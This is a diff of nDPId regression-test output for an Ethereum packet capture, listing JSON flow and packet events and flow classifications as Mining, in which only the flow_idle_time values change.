+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGngTAqAG4NOelbN0qdl\/FC\/gzAAAAALAC\/\/\/SVwAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFafAqAG4v+qixt0sdl9ft67AAAAAALAC\/\/\/4vwAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGdIHAqAG4NLvPG90tdl\/U+mmAAAAAALAC\/\/8nlgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":56622,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+YrAqAG4EopsQ90udl8TbQyrAAAAALAC\/\/\/LAQAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.81.28","src_port":56623,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFLLAqAG4EopRHN0vdl8VNVkbAAAAALAC\/\/+X7wAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGvA\/AqAG4WSZjIt0wdl+afwcPAAAAALAC\/\/8MDgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/8DmAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAfvAqAG4soDD3N0ydl\/wysJIAAAAALAC\/\/9AcgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPejAqAG4Iv8Xcd0zdl8e+UQoAAAAALAC\/\/\/MUAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"3.209.45.79","src_port":56628,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1578508364523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364523,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGRzjAqAG4A9EtT900dl+bF1VlAAAAALAC\/\/9IRAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1578508364563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508364563,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxV7ZAADERmgVCKlL2wKgBuHZfdl8AnaK0fEIbGBqDvIrgEkHISxvw4daIo1RSAPsaWiRQZnDOwteCpdNuEHAKkf4qhTn951kjq+ta18NQVXgW\/g4PPXuXiV0Qa\/G9UyK1NNATBLMnTaWqYuSaSklfuyWrYJCN+duPAALyy4RPFs69gun3gun3oGE9eACysJzHYDAgc39fUYaAxGcHwJ0T9TM+bdQkH1h\/hF4WIIg="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364565,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GcyYjnvSXwKgBuHZf3ScG6rxyhP4uMKAScSBDbwAAAgQFrAQCCAo03AK8ItiUTwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1578508364565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364565,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GcyYjnvSXwKgBuHZf3ScG6rxyhP4uMKAScSBDbwAAAgQFrAQCCAo03AK8ItiUTwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1578508364565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364565,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGYC7AqAG4I570l90ndl+E\/i4wBuq8c4AQECzS\/AAAAQEICiLYlHo03AK8"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1578508364566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364566,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDf+ygMPcwKgBuHZf3TL4VGlQ8MrCSaAScSATXAAAAgQFrAQCCApfPQwNItiUTwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1578508364566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364566,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAgfAqAG4soDD3N0ydl\/wysJJ+FRpUYAQECyi6QAAAQEICiLYlHpfPQwN"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364522,"flow_last_seen":1578508364568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":495,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":546,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508364568,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1578508364569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364569,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGyBNZJmMiwKgBuHZf3TAEAfQVmn8HEKAScSAQTQAAAgQFrAQCCApfmkPpItiUTwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1578508364569,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364569,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGvBvAqAG4WSZjIt0wdl+afwcQBAH0FoAQECyf1wAAAQEICiLYlH1fmkPp"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508364571,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1578508364593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508364593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGVuwi\/xdxwKgBuHZf3TMrXBsGHvlEKaAScSD3ewAAAgQFrAQCCAqnEIc7ItiUTwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1578508364593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508364593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPfTAqAG4Iv8Xcd0zdl8e+UQpK1wbB4AQECyG7wAAAQEICiLYlJSnEIc7"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508364523,"flow_last_seen":1578508364595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508364595,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 